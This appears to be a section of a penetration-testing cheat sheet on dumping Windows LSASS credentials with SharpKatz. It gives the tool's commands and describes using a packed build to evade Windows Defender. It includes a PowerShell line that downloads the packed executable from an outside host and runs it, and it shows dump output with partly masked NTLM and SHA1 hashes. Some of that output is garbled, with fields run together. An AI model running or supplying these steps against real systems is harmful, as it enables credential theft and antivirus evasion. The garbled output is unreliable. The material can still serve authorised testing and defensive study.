==================================================================================================================================
OS Credential Dumping (LSASS) using 'SHARPKATZ'
==================================================================================================================================

After a user logs on a Windows computer, the system generates and stores a variety of credential materials in LSASS process memory. 
Our objective is to extract the password hashes of the local and/or domain accounts stored in the memory of the Local Security 
Authority Subsystem Service (LSASS process) of a target Windows computer. 
A valid local or domain Windows account member of the 'local administrator' group is required for dumping the LSASS process.

> Usefull link: https://attack.mitre.org/techniques/T1003/001/

The tool SharpKatz.exe is a porting version in C# of the following mimikatz commands: 
> sekurlsa::logonpasswords
> sekurlsa::ekeys
> lsadump::dcsync

=> https://github.com/b4rtik/SharpKatz

SharpKatz command to retrieve credentials from all providers:
> SharpKatz.exe --Command logonpasswords


---------------------------------------------------------------------------------------------------------------------------------
Example. Use 'SharpKatz.exe' to dump/extract the Windows password hashes stored in the live memory (LSASS) of a Windows server  
---------------------------------------------------------------------------------------------------------------------------------

Note: Since the tool 'SharpKatz.exe' is detected by AV products, we use in this exemple a packed version of SharpKatz.exe to bypass
the Windows Defender AV running on the target Windows server 2016. To learn about AV bypass techniques please refer to the section
'Defense evasion (examples)' of this Github project.


PS C:\Users\Administrator\Downloads> wget -URI http://192.168.56.104:8080/Packed-Sharp-Katz.exe -OutFile Packed-Sharp-Katz.exe

PS C:\Users\Administrator\Downloads> Packed-Sharp-Katz.exe --Command logonpasswords

[*]
[*]                     System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT                                                  |
[*] ----------------------------------------------------------------------
[*] | Major: 10            | Minor: 0             | Build: 14393         |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 10.0.14393.0                         |
[*] ----------------------------------------------------------------------
[*]
[*] Authentication Id   : 0;431480 (00000000:00431480)
[*] Session             : Network from 0
[*] UserName            : Administrator] LogonTime: 2023/02/11 22:17:20
[*] SID                 : S-1-5-21-2855040287-2641962212-1900751911-500
[*]
[*]      Kerberos
[*]       Domain   : WEBSERVER28786)
[*] Session             : Interactive from 1
[*] UserName            : DWM-1ger-5-90-0-1
[*]
[*]      Msv
[*]       Domain   : COMPANY
[*]       Username : WEBSERVER2$
[*]       LM       : 00000000000000000000000000000000
[*]       NTLM     : b71e7e77879711011bc5c3<SNIP>
[*]       SHA1     : 3e142f00c4a695910fed0b<SNIP>
[*]       DPAPI    : 00000000000000000000000000000000
[*]
[*]      WDigest
[*]       Hostname : COMPANYame : WEBSERVER2$ : company.workVcZrm/Uc&+*ujA?lCgl,DfzQ7c?FZh<SNIP>
[*]
[*] Authentication Id   : 0;58011 (00000000:00058011)
[*] Session             : Interactive from 1
[*] UserName            : DWM-1ager1-5-90-0-1
[*]
[*]      Msv
[*]       Domain   : COMPANY
[*]       Username : WEBSERVER2$
[*]       LM       : 00000000000000000000000000000000
[*]       NTLM     : b71e7e77879711011bc5c39b<SNIP>
[*]       SHA1     : 3e142f00c4a695910fed0bac<SNIP>
[*]       DPAPI    : 00000000000000000000000000000000
[*]
[*]      WDigest
<SNIP>
